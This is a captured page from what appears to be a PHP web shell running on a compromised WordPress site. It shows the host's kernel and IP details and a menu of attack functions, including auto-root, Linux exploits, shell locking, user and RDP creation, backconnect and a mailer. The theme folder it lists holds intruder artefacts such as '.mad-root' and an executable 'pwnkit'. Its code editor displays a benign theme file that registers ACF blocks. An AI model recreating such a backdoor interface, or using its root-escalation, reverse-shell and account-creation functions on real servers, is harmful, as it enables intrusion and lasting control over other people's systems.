Linux webd002.cluster130.gra.hosting.ovh.net 6.18.39-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Tue Jul 21 12:03:15 CEST 2026 x86_64
Apache
: 10.130.40.2 | : 216.73.217.172
Cant Read [ /etc/named.conf ]
8.3.31
espacpq
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
espacpq /
www /
wp-content /
themes /
alpha /
inc /
[ HOME SHELL ]
Name
Size
Permission
Action
acf
[ DIR ]
drwxr-xr-x
acf-fields
[ DIR ]
drwxr-xr-x
acf-icon-field
[ DIR ]
drwxr-xr-x
widgets
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
acf-blocks.php
7.95
KB
-rw-r--r--
acf-enhancements.php
1.51
KB
-rw-r--r--
acf-fields.php
1.37
KB
-rw-r--r--
acf-load.php
919
B
-rw-r--r--
acf-options.php
425
B
-rw-r--r--
alpha-menu.php
2.08
KB
-rw-r--r--
class-alpha-menu-walker.php
4.56
KB
-rw-r--r--
custom-header.php
1.83
KB
-rw-r--r--
customizer.php
1.67
KB
-rw-r--r--
jetpack.php
1.42
KB
-rw-r--r--
product-post-type.php
7.68
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
story-post-type.php
3.96
KB
-rw-r--r--
template-functions.php
907
B
-rw-r--r--
template-tags.php
7.08
KB
-rw-r--r--
widgets.php
805
B
-rw-r--r--
wp-cli-acf-tools.php
10.51
KB
-rw-r--r--
wpcom.php
746
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : acf-blocks.php
<?php /** * Place all ACF powered blocks definitions here. * * @package Alpha */ /** * Registers ACF blocks. */ function alpha_register_acf_block_types() { acf_register_block_type( array( 'name' => 'hero', 'title' => __( 'Hero', 'alpha' ), 'description' => __( 'Hero', 'alpha' ), 'render_template' => 'template-parts/blocks/hero.php', 'category' => 'alpha', 'keywords' => array( 'hero', 'alpha' ), 'mode' => 'auto', 'icon' => 'images-alt2', 'supports' => array( 'mode' => false, 'align' => false, 'anchor' => true, 'customClassName' => true, 'jsx' => true, ), ) ); acf_register_block_type( array( 'name' => 'stats', 'title' => __( 'Stats', 'alpha' ), 'description' => __( 'Stats', 'alpha' ), 'render_template' => 'template-parts/blocks/stats.php', 'category' => 'alpha', 'keywords' => array( 'stats', 'alpha' ), 'mode' => 'auto', 'icon' => 'images-alt2', 'supports' => array( 'mode' => false, 'align' => false, 'anchor' => true, 'customClassName' => true, 'jsx' => true, ), ) ); acf_register_block_type( array( 'name' => 'testimonials', 'title' => __( 'Testimonials', 'alpha' ), 'description' => __( 'Testimonials', 'alpha' ), 'render_template' => 'template-parts/blocks/testimonials.php', 'category' => 'alpha', 'keywords' => array( 'testimonials', 'alpha' ), 'mode' => 'auto', 'icon' => 'images-alt2', 'supports' => array( 'mode' => false, 'align' => false, 'anchor' => true, 'customClassName' => true, 'jsx' => true, ), ) ); acf_register_block_type( array( 'name' => 'card', 'title' => __( 'Card', 'alpha' ), 'description' => __( 'Card', 'alpha' ), 'render_template' => 'template-parts/blocks/card.php', 'category' => 'alpha', 'keywords' => array( 'card', 'alpha' ), 'mode' => 'preview', 'icon' => 'images-alt2', 'supports' => array( 'mode' => false, 'align' => false, 'anchor' => true, 'customClassName' => true, 'jsx' => true, ), ) ); acf_register_block_type( array( 'name' => 'accordion', 'title' => __( 'Accordion', 'alpha' ), 'description' => __( 'Accordion', 'alpha' ), 'render_template' => 'template-parts/blocks/accordion.php', 'category' => 'alpha', 'keywords' => array( 'accordion', 'alpha' ), 'mode' => 'auto', 'icon' => 'images-alt2', 'supports' => array( 'mode' => false, 'align' => false, 'anchor' => true, 'customClassName' => true, 'jsx' => true, ), ) ); acf_register_block_type( array( 'name' => 'image-text', 'title' => __( 'Image with text', 'alpha' ), 'description' => __( 'Image with text', 'alpha' ), 'render_template' => 'template-parts/blocks/image-text.php', 'category' => 'alpha', 'keywords' => array( 'image', 'text', 'alpha' ), 'mode' => 'preview', 'icon' => 'images-alt2', 'supports' => array( 'mode' => false, 'align' => false, 'anchor' => true, 'customClassName' => true, 'jsx' => true, ), ) ); acf_register_block_type( array( 'name' => 'offices', 'title' => __( 'National Offices', 'alpha' ), 'description' => __( 'National Offices', 'alpha' ), 'render_template' => 'template-parts/blocks/offices.php', 'category' => 'alpha', 'keywords' => array( 'offices', 'alpha' ), 'mode' => 'preview', 'icon' => 'images-alt2', 'supports' => array( 'mode' => false, 'align' => false, 'anchor' => true, 'customClassName' => true, 'jsx' => true, ), ) ); acf_register_block_type( array( 'name' => 'stories', 'title' => __( 'Stories', 'alpha' ), 'description' => __( 'Stories', 'alpha' ), 'render_template' => 'template-parts/blocks/stories.php', 'category' => 'alpha', 'keywords' => array( 'offices', 'alpha' ), 'mode' => 'preview', 'icon' => 'images-alt2', 'supports' => array( 'mode' => false, 'align' => false, 'anchor' => true, 'customClassName' => true, 'jsx' => true, ), ) ); acf_register_block_type( array( 'name' => 'product-meta', 'title' => __( 'Product Meta', 'alpha' ), 'description' => __( 'Product Meta', 'alpha' ), 'render_template' => 'template-parts/blocks/product-meta.php', 'category' => 'alpha', 'keywords' => array( 'product', 'meta', 'alpha' ), 'mode' => 'preview', 'icon' => 'images-alt2', 'supports' => array( 'mode' => false, 'align' => false, 'anchor' => true, 'customClassName' => true, 'jsx' => true, ), ) ); acf_register_block_type( array( 'name' => 'episodes', 'title' => __( 'Episodes', 'alpha' ), 'description' => __( 'Episodes', 'alpha' ), 'render_template' => 'template-parts/blocks/episodes.php', 'category' => 'alpha', 'keywords' => array( 'episodes', 'alpha' ), 'mode' => 'auto', 'icon' => 'images-alt2', 'supports' => array( 'mode' => false, 'align' => false, 'anchor' => true, 'customClassName' => true, 'jsx' => true, ), ) ); acf_register_block_type( array( 'name' => 'contributor', 'title' => __( 'Contributor', 'alpha' ), 'description' => __( 'Contributor', 'alpha' ), 'render_template' => 'template-parts/blocks/contributor.php', 'category' => 'alpha', 'keywords' => array( 'episodes', 'alpha' ), 'mode' => 'preview', 'icon' => 'images-alt2', 'supports' => array( 'mode' => false, 'align' => false, 'anchor' => true, 'customClassName' => true, 'jsx' => true, ), ) ); acf_register_block_type( array( 'name' => 'products', 'title' => __( 'Products', 'alpha' ), 'description' => __( 'Products', 'alpha' ), 'render_template' => 'template-parts/blocks/products.php', 'category' => 'alpha', 'keywords' => array( 'products', 'alpha' ), 'mode' => 'preview', 'icon' => 'images-alt2', 'supports' => array( 'mode' => false, 'align' => false, 'anchor' => true, 'customClassName' => true, 'jsx' => true, ), ) ); /* acf_register_block_type( array( 'name' => 'hero-slider', 'title' => __( 'Hero Slider' ), 'description' => __( 'Hero Slider' ), 'render_template' => 'template-parts/blocks/hero-slider.php', 'category' => 'alpha', 'keywords' => array( 'slider', 'hero' ), 'mode' => 'preview', 'icon' => 'images-alt2', 'supports' => array( 'mode' => false, 'align' => false, 'anchor' => true, 'customClassName' => true, 'jsx' => true, ), ) ); */ } // Check if function exists and hook into setup. if ( function_exists( 'acf_register_block_type' ) ) { add_action( 'acf/init', 'alpha_register_acf_block_types' ); }
Close